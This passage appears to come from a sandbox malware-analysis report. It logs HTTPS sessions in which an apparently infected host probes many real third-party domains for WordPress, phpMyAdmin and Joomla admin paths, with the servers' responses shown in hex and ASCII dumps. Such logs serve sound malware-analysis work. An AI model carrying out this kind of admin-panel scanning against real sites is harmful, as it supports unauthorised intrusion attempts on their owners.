type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src="https:
2024-02-20 23:26:13 UTC	629	IN	Data Raw: 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 Data Ascii: core-js"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includ
2024-02-20 23:26:13 UTC	7	IN	Data Raw: 32 0d 0a 0a 09 0d 0a Data Ascii: 2
2024-02-20 23:26:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	61879	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:13 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.6	61963	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	384	OUT	GET /wp-admin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://acidvision.com/wp-login.php
2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_TsL/KdXAAqGHQIJ3xwksFssbb6qECWgfgA5EM5W93D/+Xkw8weZH3bHgVCBxfQcD9V4tcrvfwxb6WSVgwkDbwQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.6	62063	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UU1zcavmWED9Z/I+I63osz8cn9QtntjGc4hYzP+3TG94XxW2s/fpNEL4QoOQDauEV2ujFpIBt4sr6YQlNL5Uyg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.6	61709	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	189	OUT	GET /administrator/index.php HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	179	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 159 Connection: close Vary: Accept-Encoding
2024-02-20 23:26:13 UTC	159	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.6	62183	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	226	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/phpmyadmin/
2024-02-20 23:26:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.6	62451	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	382	OUT	GET /wp-admin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://blauthlaw.com/wp-login.php
2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jS/2Vy0P0OTiXqJLKnsCtgw77uwADiq6diWFxfnG4qEMfJoQ9rZK2B1LYT4CbkpHLwCAuA4ti5QJhWMMnBrblw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.6	62488	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	173	OUT	GET /wp-login.php HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_SlTMhctxhmMBDzSa7ss2UPWW84ugO1EjKym3xqnnHXFpWGiueAW/sSaPiPfLMghtp/daaZiNhTYTkdHM3rfndQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.6	62330	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	443	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/phpmyadmin Content-Length: 249 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:13 UTC	249	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/phpmyadmin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.6	62410	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	172	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_EdetkJBur235AdXp1iUfBZ95N2iZTDIbNo9msbhBzGvupucg3uIMChy/gmZlCOXAg+QgED1p7Ya6BC1cRcitgA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.6	62408	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	215	OUT	GET /wp-login.php HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:13 GMT Connection: close
2024-02-20 23:26:13 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.6	62557	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	374	OUT	GET /wp-admin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://att.com.au/wp-login.php
2024-02-20 23:26:13 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_LG6zNOGLL9rwMIzGXpxEZGGRNx4KbinSmNWNXRhMFAqjIRHUsSEL56JjF63u6ny8yA6+3BM+8FxcqT1dDBb0KQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.6	62862	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
